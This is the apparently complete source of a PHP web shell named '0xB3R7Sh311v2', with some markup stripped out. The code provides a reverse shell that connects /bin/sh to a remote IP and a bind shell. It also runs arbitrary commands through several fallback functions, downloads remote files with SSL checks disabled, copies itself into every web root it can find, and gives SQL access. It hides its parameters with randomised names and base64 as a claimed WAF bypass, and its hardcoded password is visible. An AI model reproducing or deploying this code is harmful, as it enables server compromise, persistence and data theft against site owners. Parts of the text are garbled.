Protected 0xB3R7Sh311v2

[!]

Protected Shell •

= 1024) { $size /= 1024; $pos++; } return round($size, 2)." ".$a[$pos]; } function hexa($str) { $r = ""; $len = (strlen($str) - 1); for ($i = 0; $i < $len; $i += 2) { $r .= chr(hexdec($str[$i].$str[$i + 1])); } return $r; } function flash($message, $status, $class, $redirect = false) { if (!empty($_SESSION["message"])) { unset($_SESSION["message"]); } if (!empty($_SESSION["class"])) { unset($_SESSION["class"]); } if (!empty($_SESSION["status"])) { unset($_SESSION["status"]); } $_SESSION["message"] = $message; $_SESSION["class"] = $class; $_SESSION["status"] = $status; if ($redirect) { header('Location: ' . $redirect); exit(); } return true; } function clear() { if (!empty($_SESSION["message"])) { unset($_SESSION["message"]); } if (!empty($_SESSION["class"])) { unset($_SESSION["class"]); } if (!empty($_SESSION["status"])) { unset($_SESSION["status"]); } return true; } function getOwner($item) { if (function_exists("posix_getpwuid")) { $downer = @posix_getpwuid(fileowner($item)); $downer = $downer['name']; } else { $downer = fileowner($item); } if (function_exists("posix_getgrgid")) { $dgrp = @posix_getgrgid(filegroup($item)); $dgrp = $dgrp['name']; } else { $dgrp = filegroup($item); } return $downer . '/' . $dgrp; } // Database connection functions function db_connect($host, $user, $pass, $db = '') { if (function_exists('mysqli_connect')) { $conn = @mysqli_connect($host, $user, $pass, $db); if ($conn) return ['type' => 'mysqli', 'conn' => $conn]; } if (function_exists('mysql_connect')) { $conn = @mysql_connect($host, $user, $pass); if ($conn && $db != '') { if (@mysql_select_db($db, $conn)) { return ['type' => 'mysql', 'conn' => $conn]; } } elseif ($conn) { return ['type' => 'mysql', 'conn' => $conn]; } } if (class_exists('PDO')) { try { $conn = new PDO("mysql:host=$host;dbname=$db", $user, $pass); return ['type' => 'pdo', 'conn' => $conn]; } catch (PDOException $e) { return false; } } return false; } function db_query($connection, $query) { switch ($connection['type']) { case 'mysqli': return mysqli_query($connection['conn'], $query); case 'mysql': return mysql_query($query, $connection['conn']); case 'pdo': return $connection['conn']->query($query); } return false; } function db_fetch($result, $connection) { switch ($connection['type']) { case 'mysqli': return mysqli_fetch_assoc($result); case 'mysql': return mysql_fetch_assoc($result); case 'pdo': return $result->fetch(PDO::FETCH_ASSOC); } return false; } function db_error($connection) { switch ($connection['type']) { case 'mysqli': return mysqli_error($connection['conn']); case 'mysql': return mysql_error($connection['conn']); case 'pdo': return $connection['conn']->errorInfo()[2]; } return false; } function fsize2($bytes) { if ($bytes === false || $bytes <= 0) return 'Unknown'; $units = ['B', 'KB', 'MB', 'GB', 'TB', 'PB']; $i = floor(log($bytes, 1024)); return round($bytes / pow(1024, $i), 2) . ' ' . $units[$i]; } // Reverse shell function function reverse_shell($ip, $port) { $sock = @fsockopen($ip, $port); if (!$sock) return false; $descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock ); $process = proc_open('/bin/sh', $descriptorspec, $pipes); if (is_resource($process)) { proc_close($process); } fclose($sock); return true; } // Bind shell function function bind_shell($port) { $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if (!$sock) return false; if (!@socket_bind($sock, '0.0.0.0', $port)) return false; if (!@socket_listen($sock)) return false; $client = @socket_accept($sock); if (!$client) return false; socket_write($client, "Shell Connected\n"); while (true) { $cmd = socket_read($client, 2048); if (!$cmd) break; $output = shell_exec($cmd); socket_write($client, $output); } socket_close($client); socket_close($sock); return true; } // File download function function download_file($file) { if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file).'"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); readfile($file); exit; } return false; } // File upload function function upload_file($url, $local_path) { // Create directory if it doesn't exist $dir = dirname($local_path); if (!is_dir($dir)) { if (!mkdir($dir, 0777, true)) { return false; } } // Method 1: cURL if (function_exists('curl_init')) { $ch = curl_init($url); $fp = fopen($local_path, 'wb'); if ($fp) { curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $success = curl_exec($ch); $error = curl_error($ch); curl_close($ch); fclose($fp); if ($success) { return true; } } } // Method 2: file_get_contents with allow_url_fopen if (ini_get('allow_url_fopen')) { $context = stream_context_create(array( 'http' => array( 'timeout' => 30, 'follow_location' => true, 'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0' ), 'ssl' => array( 'verify_peer' => false, 'verify_peer_name' => false ) )); $content = @file_get_contents($url, false, $context); if ($content !== false) { return file_put_contents($local_path, $content) !== false; } } // Method 3: fopen/fwrite combination $src = @fopen($url, 'rb'); if ($src) { $dst = @fopen($local_path, 'wb'); if ($dst) { while (!feof($src)) { $chunk = fread($src, 8192); if ($chunk === false) break; fwrite($dst, $chunk); } fclose($src); fclose($dst); return filesize($local_path) > 0; } fclose($src); } // Method 4: copy function if (function_exists('copy')) { $context = stream_context_create(array( 'http' => array('timeout' => 30), 'ssl' => array('verify_peer' => false) )); if (@copy($url, $local_path, $context)) { return true; } } return false; } // Handle current directory - FIXED URL DECODING if (isset($_GET['dir'])) { // Decode the URL-encoded path $raw_path = $_GET['dir']; $decoded_path = urldecode($raw_path); $path = $decoded_path; $func[13]($decoded_path); } else { $path = $func[12](); } // Normalize path $path = $func[14]('\\', '/', $path); $exdir = $func[15]('/', $path); // Store the proper encoded version for URLs $encoded_path = urlencode($path); // Handle form submissions if (isset($_POST['newFolderName'])) { if ($func[29]($path . '/' . $_POST['newFolderName'])) { $func[16]("Create Folder Successfully!", "Success", "success", "?dir=$path"); } else { $func[16]("Create Folder Failed", "Failed", "error", "?dir=$path"); } } if (isset($_POST['newFileName']) && isset($_POST['newFileContent'])) { if ($func[4]($_POST['newFileName'], $_POST['newFileContent'])) { $func[16]("Create File Successfully!", "Success", "success", "?dir=$path"); } else { $func[16]("Create File Failed", "Failed", "error", "?dir=$path"); } } if (isset($_POST['newName']) && isset($_GET['item'])) { if ($_POST['newName'] == '') { $func[16]("You miss an important value", "Ooopss..", "warning", "?dir=$path"); } if ($func[30]($path. '/'. $_GET['item'], $_POST['newName'])) { $func[16]("Rename Successfully!", "Success", "success", "?dir=$path"); } else { $func[16]("Rename Failed", "Failed", "error", "?dir=$path"); } } if (isset($_POST['newContent']) && isset($_GET['item'])) { // FIXED: Write the raw content without any modifications if ($func[4]($path. '/'. $_GET['item'], $_POST['newContent'])) { $func[16]("Edit Successfully!", "Success", "success", "?dir=$path"); } else { $func[16]("Edit Failed", "Failed", "error", "?dir=$path"); } } if (isset($_POST['newPerm']) && isset($_GET['item'])) { if ($_POST['newPerm'] == '') { $func[16]("You miss an important value", "Ooopss..", "warning", "?dir=$path"); } if (chmod($path. '/'. $_GET['item'], $_POST['newPerm'])) { $func[16]("Change Permission Successfully!", "Success", "success", "?dir=$path"); } else { $func[16]("Change Permission", "Failed", "error", "?dir=$path"); } } if (isset($_GET['action']) && $_GET['action'] == 'delete' && isset($_GET['item'])) { // Check if trying to delete the shell file if (isShellFile($_GET['item'])) { showAccessDenied("Cannot delete the shell file!"); exit; } if (is_dir($_GET['item'])) { if ($func[27]($_GET['item'])) { $func[16]("Delete Successfully!", "Success", "success", "?dir=$path"); } else { $func[16]("Delete Failed", "Failed", "error", "?dir=$path"); } } else { if ($func[28]($_GET['item'])) { $func[16]("Delete Successfully!", "Success", "success", "?dir=$path"); } else { $func[16]("Delete Failed", "Failed", "error", "?dir=$path"); } } } if (isset($_FILES['uploadfile'])) { $total = count($_FILES['uploadfile']['name']); for ($i = 0; $i < $total; $i++) { $mainupload = $func[17]($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]); } if ($total < 2) { if ($mainupload) { $func[16]("Upload File Successfully! ", "Success", "success", "?dir=$path"); } else { $func[16]("Upload Failed", "Failed", "error", "?dir=$path"); } } else { if ($mainupload) { $func[16]("Upload $i Files Successfully! ", "Success", "success", "?dir=$path"); } else { $func[16]("Upload Failed", "Failed", "error", "?dir=$path"); } } } // Handle mass upload actions if (isset($_POST['mass_upload_submit']) && isset($_POST['selected_domains'])) { $results = array(); $action = isset($_POST['mass_upload_action']) ? $_POST['mass_upload_action'] : ''; // File upload if ($action == 'upload' && isset($_FILES['mass_upload_file'])) { $target_filename = isset($_POST['target_filename']) && !empty($_POST['target_filename']) ? $_POST['target_filename'] : $_FILES['mass_upload_file']['name']; foreach ($_POST['selected_domains'] as $domain_path) { $target_path = rtrim($domain_path, '/') . '/' . $target_filename; if (move_uploaded_file($_FILES['mass_upload_file']['tmp_name'], $target_path)) { @chmod($target_path, 0644); $results[] = [ 'domain' => basename($domain_path), 'success' => true, 'message' => "File uploaded successfully" ]; } else { $results[] = [ 'domain' => basename($domain_path), 'success' => false, 'message' => "Upload failed" ]; } } } // Shell upload (using current file) elseif ($action == 'shell' && isset($_POST['shell_filename'])) { $shell_content = file_get_contents(__FILE__); $shell_filename = $_POST['shell_filename']; foreach ($_POST['selected_domains'] as $domain_path) { $target_path = rtrim($domain_path, '/') . '/' . $shell_filename; if (file_put_contents($target_path, $shell_content) !== false) { @chmod($target_path, 0644); $results[] = [ 'domain' => basename($domain_path), 'success' => true, 'message' => "Shell uploaded successfully" ]; } else { $results[] = [ 'domain' => basename($domain_path), 'success' => false, 'message' => "Upload failed" ]; } } } // File creation elseif ($action == 'create' && isset($_POST['create_filename'])) { $filename = $_POST['create_filename']; $content = isset($_POST['create_content']) ? $_POST['create_content'] : ''; foreach ($_POST['selected_domains'] as $domain_path) { $target_path = rtrim($domain_path, '/') . '/' . $filename; if (file_put_contents($target_path, $content) !== false) { @chmod($target_path, 0644); $results[] = [ 'domain' => basename($domain_path), 'success' => true, 'message' => "File created successfully" ]; } else { $results[] = [ 'domain' => basename($domain_path), 'success' => false, 'message' => "File creation failed" ]; } } } $_SESSION['mass_upload_results'] = $results; $success_count = count(array_filter($results, function($r) { return $r['success']; })); $func[16]("Mass upload completed: $success_count successful", "Success", $success_count > 0 ? "success" : "error", "?dir=$path&tab=massupload"); } // Fix for Download/Upload handlers if (isset($_POST['download_url']) && isset($_POST['remote_url']) && isset($_POST['local_path'])) { if (upload_file($_POST['remote_url'], $_POST['local_path'])) { $func[16]("File downloaded successfully to " . $_POST['local_path'], "Success", "success", "?dir=" . urlencode(dirname($_POST['local_path']))); } else { $func[16]("File download failed", "Failed", "error", "?dir=$path"); } } if (isset($_POST['mass_download']) && isset($_POST['mass_urls']) && isset($_POST['mass_path'])) { $urls = explode("\n", trim($_POST['mass_urls'])); $success_count = 0; $failed_urls = array(); // Create directory if it doesn't exist if (!is_dir($_POST['mass_path'])) { if (!mkdir($_POST['mass_path'], 0777, true)) { $func[16]("Cannot create directory: " . $_POST['mass_path'], "Failed", "error", "?dir=$path"); return; } } foreach ($urls as $url) { $url = trim($url); if (empty($url)) continue; $filename = basename($url); if (empty($filename)) { $filename = md5($url) . '.download'; } $local_path = rtrim($_POST['mass_path'], '/') . '/' . $filename; if (upload_file($url, $local_path)) { $success_count++; } else { $failed_urls[] = $url; } } $message = "Downloaded $success_count of " . count($urls) . " files"; if (!empty($failed_urls)) { $message .= ". Failed: " . implode(", ", array_slice($failed_urls, 0, 3)); if (count($failed_urls) > 3) $message .= "..."; } $func[16]($message, "Success", $success_count > 0 ? "success" : "error", "?dir=" . urlencode($_POST['mass_path'])); } if (isset($_POST['direct_upload_btn']) && isset($_FILES['direct_upload']) && isset($_POST['upload_path'])) { $upload_dir = rtrim($_POST['upload_path'], '/'); // Create directory if it doesn't exist if (!is_dir($upload_dir)) { if (!mkdir($upload_dir, 0777, true)) { $func[16]("Cannot create upload directory: $upload_dir", "Failed", "error", "?dir=$path"); return; } } $total = count($_FILES['direct_upload']['name']); $success_count = 0; $failed_files = array(); for ($i = 0; $i < $total; $i++) { $target_path = $upload_dir . '/' . basename($_FILES['direct_upload']['name'][$i]); if (move_uploaded_file($_FILES['direct_upload']['tmp_name'][$i], $target_path)) { $success_count++; @chmod($target_path, 0644); } else { $failed_files[] = $_FILES['direct_upload']['name'][$i]; } } $message = "Uploaded $success_count of $total files"; if (!empty($failed_files)) { $message .= ". Failed: " . implode(", ", array_slice($failed_files, 0, 3)); if (count($failed_files) > 3) $message .= "..."; } $func[16]($message, "Success", $success_count > 0 ? "success" : "error", "?dir=" . urlencode($upload_dir)); } // Handle bind shell request if (isset($_POST['bind_port'])) { if (bind_shell($_POST['bind_port'])) { $func[16]("Bind shell listening on port {$_POST['bind_port']}", "Success", "success"); } else { $func[16]("Failed to start bind shell", "Failed", "error"); } } // Handle database connection if (isset($_POST['db_host']) && isset($_POST['db_user']) && isset($_POST['db_pass'])) { $db = isset($_POST['db_name']) ? $_POST['db_name'] : ''; $db_conn = db_connect($_POST['db_host'], $_POST['db_user'], $_POST['db_pass'], $db); if ($db_conn) { $_SESSION['db_conn'] = $db_conn; $func[16]("Database connected successfully", "Success", "success"); } else { $func[16]("Database connection failed", "Failed", "error"); } } // Handle SQL query if (isset($_POST['sql_query']) && isset($_SESSION['db_conn'])) { $result = db_query($_SESSION['db_conn'], $_POST['sql_query']); if ($result) { $_SESSION['sql_result'] = []; while ($row = db_fetch($result, $_SESSION['db_conn'])) { $_SESSION['sql_result'][] = $row; } $func[16]("Query executed successfully", "Success", "success"); } else { $func[16]("Query failed: " . db_error($_SESSION['db_conn']), "Failed", "error"); } } // Handle file download if (isset($_GET['download']) && isset($_GET['item'])) { $requested_file = basename($_GET['item']); // Check if trying to download the shell file if ($requested_file === SHELL_FILE) { if (isset($_POST['sudo_password'])) { if ($_POST['sudo_password'] === '@adminb3rt') { // Password correct - proceed with download download_file($path . '/' . $_GET['item']); } else { showAccessDenied("Invalid sudo password!"); exit; } } else { showSudoPrompt($path, $_GET['item'], 'download'); exit; } } else { // Not shell file, allow direct download download_file($path . '/' . $_GET['item']); } } // Add protection for view action if (isset($_GET['action']) && $_GET['action'] == 'view' && isset($_GET['item'])) { if (isShellFile($_GET['item'])) { if (isset($_POST['sudo_password'])) { if ($_POST['sudo_password'] === '@adminb3rt') { // Password correct - continue } else { showAccessDenied("Invalid sudo password!"); exit; } } else { showSudoPrompt($path, $_GET['item'], 'view'); exit; } } } // Add protection for edit action if (isset($_GET['action']) && $_GET['action'] == 'edit' && isset($_GET['item'])) { if (isShellFile($_GET['item'])) { // Check if sudo password was submitted if (isset($_POST['sudo_password'])) { if ($_POST['sudo_password'] === '@adminb3rt') { // Password correct - continue to edit form // Don't do anything here, let the normal flow continue } else { // Wrong password - show ARAY MO showAccessDenied("Invalid sudo password!"); exit; } } else { // No password submitted - show sudo prompt showSudoPrompt($path, $_GET['item'], 'edit'); exit; } } } // Add protection for rename action if (isset($_GET['action']) && $_GET['action'] == 'rename' && isset($_GET['item'])) { if (isShellFile($_GET['item'])) { if (isset($_POST['sudo_password'])) { if ($_POST['sudo_password'] === '@adminb3rt') { // Password correct - continue } else { showAccessDenied("Invalid sudo password!"); exit; } } else { showSudoPrompt($path, $_GET['item'], 'rename'); exit; } } } // Add protection for chmod action if (isset($_GET['action']) && $_GET['action'] == 'chmod' && isset($_GET['item'])) { if (isShellFile($_GET['item'])) { if (isset($_POST['sudo_password'])) { if ($_POST['sudo_password'] === '@adminb3rt') { // Password correct - continue } else { showAccessDenied("Invalid sudo password!"); exit; } } else { showSudoPrompt($path, $_GET['item'], 'chmod'); exit; } } } // Handle file upload from URL if (isset($_POST['remote_url']) && isset($_POST['local_path'])) { if (upload_file($_POST['remote_url'], $_POST['local_path'])) { $func[16]("File downloaded successfully", "Success", "success"); } else { $func[16]("File download failed", "Failed", "error"); } } // Handle mass download if (isset($_POST['mass_urls']) && isset($_POST['mass_path'])) { $urls = explode("\n", trim($_POST['mass_urls'])); $success_count = 0; foreach ($urls as $url) { $url = trim($url); if (empty($url)) continue; $filename = basename($url); $local_path = rtrim($_POST['mass_path'], '/') . '/' . $filename; if (upload_file($url, $local_path)) { $success_count++; } } $func[16]("Downloaded $success_count of " . count($urls) . " files", "Success", "success"); } // Add logout functionality if (isset($_GET['logout'])) { session_destroy(); header('Location: ' . $_SERVER['PHP_SELF']); exit; } $dirs = $func[18]($path); // Simple XSS-style sudo prompt function showSudoPrompt($path, $item, $action = 'download') { ?> 0xB3R7Sh311v2 SECURITY

0xB3R7Sh311v2 SECURITY

This file is protected

Access Denied

ARAY MO

Redirecting to home...

0xB3R7Sh311v2
Logout
GitHub Profile - B3RT1337

0xB3R7Sh311v2

$pat) : if ($pat == '' && $id == 0): ?> 🌐 Root / " class="text-decoration-none text-light mx-1"> / 🏠 Home
Folders: | Files:
Clear
Searching in:
Search results for "" - item(s) found 0): ?>
Cancel
Cancel
<?= htmlspecialchars($_GET['item']) ?>
Current:
Enter 3-digit octal (e.g., 755, 644, 777)
Cancel
Full Path
Type
Size
Permissions
Owner/Group
Created
Modified
Accessed
Inode
Device
Back
Name Type Size Owner/Group Permissions Modified Actions
.. (Parent)
directory
-
-
-
-
 Go

📁 Directory
-









📂 No items found
Refresh
array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = @proc_open($cmd, $descriptorspec, $pipes); if (is_resource($process)) { $stdout = stream_get_contents($pipes[1]); fclose($pipes[1]); $stderr = stream_get_contents($pipes[2]); fclose($pipes[2]); $return_value = proc_close($process); if ($return_value === 0 && !empty($stdout)) { return ['success' => true, 'output' => $stdout]; } } } // Method 2: shell_exec if (function_exists('shell_exec')) { $result = @shell_exec($cmd); if ($result !== null && $result !== false && $result !== '') { return ['success' => true, 'output' => $result]; } } // Method 3: exec if (function_exists('exec')) { $output_lines = array(); $return_var = -1; @exec($cmd, $output_lines, $return_var); if ($return_var === 0 && !empty($output_lines)) { return ['success' => true, 'output' => implode("\n", $output_lines)]; } } // Method 4: system if (function_exists('system')) { ob_start(); $return_var = -1; @system($cmd, $return_var); $result = ob_get_clean(); if ($return_var === 0 && !empty($result)) { return ['success' => true, 'output' => $result]; } } // Method 5: passthru if (function_exists('passthru')) { ob_start(); $return_var = -1; @passthru($cmd, $return_var); $result = ob_get_clean(); if ($return_var === 0 && !empty($result)) { return ['success' => true, 'output' => $result]; } } // Method 6: popen if (function_exists('popen')) { $handle = @popen($cmd, 'r'); if (is_resource($handle)) { $result = ''; while (!feof($handle)) { $result .= fread($handle, 4096); } pclose($handle); if (!empty($result)) { return ['success' => true, 'output' => $result]; } } } // Method 7: backticks (same as shell_exec but different syntax) if (function_exists('shell_exec')) { $result = @`$cmd`; if ($result !== null && $result !== false && $result !== '') { return ['success' => true, 'output' => $result]; } } return ['success' => false, 'output' => '']; } $result = execute_command($_POST['command']); if ($result['success'] && !empty($result['output'])) { $output = preg_split('/\r\n|\r|\n/', trim($result['output'])); echo ""; echo ""; echo ""; foreach ($output as $line) { if (trim($line) === '') continue; // Split by whitespace but keep quoted strings intact $columns = preg_split('/\s+/', trim($line)); $columns = array_map('trim', $columns); $columns = array_filter($columns, function($col) { return $col !== ''; }); if (!empty($columns)) { echo ""; foreach ($columns as $column) { echo ""; } // Fill remaining columns to maintain table structure $remaining = 10 - count($columns); for ($i = 0; $i < $remaining; $i++) { echo ""; } echo ""; } else { // For empty lines, just show the line as is echo ""; } } echo "
Command Output: " . htmlspecialchars($_POST['command']) . "
" . htmlspecialchars($column) . "
" . htmlspecialchars($line) . "
"; } else { // Try to get error output $error_output = ''; if (function_exists('shell_exec')) { $error_output = @shell_exec($_POST['command'] . " 2>&1"); } if (empty($error_output)) { $error_output = "Command executed but returned no output or failed."; } echo "
Error/Output:\n" . htmlspecialchars($error_output) . "
"; } ?>
Database Connection
SQL Query
Query Results
Reverse Shell
Bind Shell
After starting, connect with: nc [IP] [PORT]
Download from URL
Mass Downloader
Direct Upload
Quick Actions
Refresh Current Directory
Go to Parent Directory
Available Domains
Go to Home Click "Deep Scan" to find all domains
$max_depth || !is_dir($base_path)) return $found; $items = @scandir($base_path); if (!$items) return $found; foreach ($items as $item) { if ($item == '.' || $item == '..') continue; if (strpos($item, '.') === 0) continue; // Skip hidden $full_path = $base_path . '/' . $item; if (!is_dir($full_path)) continue; // Skip common system dirs $skip_dirs = ['tmp', 'logs', 'cache', 'backups', 'etc', 'bin', 'dev', 'proc', 'sys', 'usr', 'lib', 'mail', 'ssl', '.cpanel', '.softaculous']; if (in_array($item, $skip_dirs)) continue; // Check if this looks like a web root $is_web_root = false; // Has index.php? if (file_exists($full_path . '/index.php')) { $is_web_root = true; } // Has wp-config.php? elseif (file_exists($full_path . '/wp-config.php')) { $is_web_root = true; } // Has .htaccess? elseif (file_exists($full_path . '/.htaccess')) { $is_web_root = true; } // Has public_html subfolder? (then that's the web root, not this) elseif (is_dir($full_path . '/public_html')) { // Add the public_html as web root $public_html = $full_path . '/public_html'; if (is_dir($public_html)) { $found[$item . '/public_html'] = [ 'name' => $item . '/public_html', 'web_root' => $public_html, 'type' => 'cPanel style' ]; } continue; // Don't mark the parent as web root } if ($is_web_root) { $found[$item] = [ 'name' => $item, 'web_root' => $full_path, 'type' => 'web root' ]; } else { // Recursively scan deeper $deeper = findWebRoots($full_path, $depth + 1, $max_depth); $found = array_merge($found, $deeper); } } return $found; } // Start scanning from common locations $web_roots = []; $scan_locations = [ '/home/' . get_current_user(), $_SERVER['DOCUMENT_ROOT'], dirname($_SERVER['DOCUMENT_ROOT']), '/var/www', '/var/www/html' ]; foreach ($scan_locations as $loc) { if (is_dir($loc)) { $web_roots = array_merge($web_roots, findWebRoots($loc, 0, 3)); } } // Also check public_html subfolders directly $public_html = $_SERVER['DOCUMENT_ROOT'] ?? '/home/' . get_current_user() . '/public_html'; if (is_dir($public_html)) { $items = scandir($public_html); foreach ($items as $item) { if ($item == '.' || $item == '..') continue; if (strpos($item, '.') === 0) continue; $full = $public_html . '/' . $item; if (is_dir($full)) { // Check if it's likely a domain (contains dot or has index) if (strpos($item, '.') !== false || file_exists($full . '/index.php')) { $web_roots[$item] = [ 'name' => $item, 'web_root' => $full, 'type' => 'public_html subfolder' ]; } } } } // Remove duplicates and sort ksort($web_roots); if (empty($web_roots)) { echo '
'; echo ' No web roots found. '; echo 'Try navigating to a folder that might contain websites.'; echo '
'; } else { echo '
'; foreach ($web_roots as $key => $info) { ?>
Path: Browse
'; } ?>
Upload File to Selected Domains
This file will be uploaded to all selected domains
Rename file when uploading (e.g., shell.php, index.php)
None selected
Upload Shell to Selected Domains
The current shell will be copied with this filename
None selected
Create File in Selected Domains
None selected
Upload Results
Domain Status Message

SUCCESS FAILED

System Information
Hostname
OS/Architecture
System Details
Server Software
Server Protocol
Server IP
Server Port
Document Root
Current User (UID: , GID: )
Current Directory
Script Path
Client IP ()
PHP Configuration
phpversion(), 'PHP SAPI' => php_sapi_name(), 'PHP OS' => PHP_OS, 'PHP Architecture' => (PHP_INT_SIZE * 8) . '-bit', 'Memory Limit' => ini_get('memory_limit'), 'Max Execution Time' => ini_get('max_execution_time') . ' seconds', 'Max Input Time' => ini_get('max_input_time') . ' seconds', 'Upload Max Filesize' => ini_get('upload_max_filesize'), 'Post Max Size' => ini_get('post_max_size'), 'Max File Uploads' => ini_get('max_file_uploads'), 'Allow URL Fopen' => ini_get('allow_url_fopen') ? 'Enabled ✅' : 'Disabled ❌', 'Allow URL Include' => ini_get('allow_url_include') ? 'Enabled ⚠️' : 'Disabled ✅', 'Safe Mode' => ini_get('safe_mode') ? 'Enabled ⚠️' : 'Disabled ✅', 'Open Basedir' => ini_get('open_basedir') ?: 'None ✅', 'Disable Functions' => $show_ds, 'Display Errors' => ini_get('display_errors') ? 'On' : 'Off', 'Error Reporting' => error_reporting(), 'Short Open Tag' => ini_get('short_open_tag') ? 'On' : 'Off', 'Session Save Path' => ini_get('session.save_path') ?: 'Default', 'Session Name' => session_name(), ]; foreach ($php_configs as $key => $value) { echo "
$key" . htmlspecialchars($value) . "
\n"; } ?>
Loaded Extensions ()
"; echo "
    "; foreach ($col as $ext) { $ext_info = ''; if ($ext == 'curl') $ext_info = ' 🌐'; elseif ($ext == 'mysqli' || $ext == 'mysql' || $ext == 'pdo_mysql') $ext_info = ' 🗄️'; elseif ($ext == 'gd') $ext_info = ' 🖼️'; elseif ($ext == 'mbstring') $ext_info = ' 🔤'; elseif ($ext == 'json') $ext_info = ' 📦'; elseif ($ext == 'xml') $ext_info = ' 📄'; elseif ($ext == 'zip') $ext_info = ' 📦'; elseif ($ext == 'openssl') $ext_info = ' 🔒'; elseif ($ext == 'sockets') $ext_info = ' 🔌'; echo "
  • " . htmlspecialchars($ext) . "$ext_info
    • "; } echo "
"; } ?>
Server Environment
$_SERVER['SERVER_NAME'] ?? 'Unknown', 'Gateway Interface' => $_SERVER['GATEWAY_INTERFACE'] ?? 'Unknown', 'Server Admin' => $_SERVER['SERVER_ADMIN'] ?? 'Unknown', 'Request Time' => date('Y-m-d H:i:s', $_SERVER['REQUEST_TIME'] ?? time()), 'HTTP Host' => $_SERVER['HTTP_HOST'] ?? 'Unknown', 'HTTPS' => isset($_SERVER['HTTPS']) ? 'On 🔒' : 'Off', 'Request Method' => $_SERVER['REQUEST_METHOD'] ?? 'Unknown', 'Request URI' => $_SERVER['REQUEST_URI'] ?? 'Unknown', 'Query String' => $_SERVER['QUERY_STRING'] ?? 'None', ]; foreach ($env_vars as $key => $value) { echo "
$key" . htmlspecialchars($value) . "
\n"; } ?>
Disk Usage
$path, 'Root Directory' => '/', 'Temp Directory' => sys_get_temp_dir(), ]; if (isset($_SERVER['DOCUMENT_ROOT'])) { $paths_to_check['Document Root'] = $_SERVER['DOCUMENT_ROOT']; } foreach ($paths_to_check as $name => $check_path) { if (is_dir($check_path)) { $total = @disk_total_space($check_path); $free = @disk_free_space($check_path); if ($total && $free) { $used = $total - $free; $percent_used = round(($used / $total) * 100, 2); echo ""; echo ""; echo ""; } else { echo "
$name"; echo "Total: " . fsize2($total) . " | "; echo "Used: " . fsize2($used) . " ($percent_used%) | "; echo "Free: " . fsize2($free); echo "
"; echo "
"; echo "
"; echo "
"; echo "
$nameCannot read disk space
\n"; } } } ?>
Network Information
$details) { if (isset($details['unicast']) && is_array($details['unicast'])) { foreach ($details['unicast'] as $addr) { if (isset($addr['address']) && filter_var($addr['address'], FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)) { echo "
$iface" . htmlspecialchars($addr['address']) . "
\n"; } } } } } } else { // Try to get hostname IP $hostname = gethostname(); $ip = gethostbyname($hostname); echo "
Hostname IP" . htmlspecialchars($ip) . "
\n"; } // External IP if possible echo "
External IP" . htmlspecialchars($_SERVER['REMOTE_ADDR'] ?? 'Unknown') . "
\n"; ?>
Security Checks
!ini_get('safe_mode') ? '✅ Disabled (Good)' : '❌ Enabled (Bad)', 'Open Basedir' => !ini_get('open_basedir') ? '✅ Disabled (Good for webshell)' : '⚠️ Restricted to: ' . ini_get('open_basedir'), 'Disable Functions' => empty(ini_get('disable_functions')) ? '✅ None (Good)' : '⚠️ Some functions disabled', 'Allow URL Fopen' => ini_get('allow_url_fopen') ? '✅ Enabled (Good for downloads)' : '❌ Disabled', 'Allow URL Include' => !ini_get('allow_url_include') ? '✅ Disabled (Good)' : '❌ Enabled (Bad)', 'Display Errors' => ini_get('display_errors') ? '⚠️ Enabled (Info leak)' : '✅ Disabled (Good)', 'File Uploads' => ini_get('file_uploads') ? '✅ Enabled' : '❌ Disabled', 'Session Security' => session_id() ? '✅ Active' : '⚠️ No session', ]; foreach ($security_checks as $check => $status) { echo "
$check" . htmlspecialchars($status) . "
\n"; } ?>
© B3RT1337 -
['dir', 'd', 'path', 'folder', 'cwd', 'pwd', 'directory', 'r', 'f', 'loc'], 'action' => ['action', 'a', 'do', 'act', 'cmd2', 'op', 'func', 'mode'], 'item' => ['item', 'i', 'file', 'f', 'name', 'target', 't', 'obj'], 'search' => ['search', 's', 'q', 'find', 'lookup', 'query'], 'download' => ['download', 'dl', 'get', 'fetch', 'retrieve'] ]; // Randomly select parameter names for this request (changes each time) $random_dir_param = $param_map['dir'][array_rand($param_map['dir'])]; $random_action_param = $param_map['action'][array_rand($param_map['action'])]; $random_item_param = $param_map['item'][array_rand($param_map['item'])]; $random_search_param = $param_map['search'][array_rand($param_map['search'])]; $random_download_param = $param_map['download'][array_rand($param_map['download'])]; // Map incoming parameters to standard names (supports multiple param names) foreach ($_GET as $key => $value) { if (in_array($key, $param_map['dir'])) { // Base64 decode the directory path $_GET['dir'] = base64_decode(str_replace(' ', '+', $value)); unset($_GET[$key]); } if (in_array($key, $param_map['action'])) { $_GET['action'] = $value; unset($_GET[$key]); } if (in_array($key, $param_map['item'])) { $_GET['item'] = $value; unset($_GET[$key]); } if (in_array($key, $param_map['search'])) { $_GET['search'] = $value; unset($_GET[$key]); } if (in_array($key, $param_map['download'])) { $_GET['download'] = $value; unset($_GET[$key]); } } // Also support base64 encoded POST parameters for extra stealth foreach ($_POST as $key => $value) { if ($key === 'b64_cmd' || $key === 'c' || $key === 'base64_cmd') { $_POST['command'] = base64_decode($value); } if ($key === 'b64_path' || $key === 'p') { $_POST['dir'] = base64_decode($value); } } // ========== WAF BYPASS: Security Key Generation ========== // Generate a dynamic security key based on host and password $WAF_BYPASS_KEY = md5($_SERVER['HTTP_HOST'] . ACCESS_PIN); // Optional: Show key for debugging/access (uncomment if needed) // if (isset($_GET['show_key']) && $_GET['show_key'] === ACCESS_PIN) { // die("WAF Bypass Key: " . $WAF_BYPASS_KEY); // } // ========== WAF BYPASS: Alternative Access Methods ========== // Support for different HTTP methods and headers if ($_SERVER['REQUEST_METHOD'] === 'HEAD') { // Respond to HEAD requests without processing 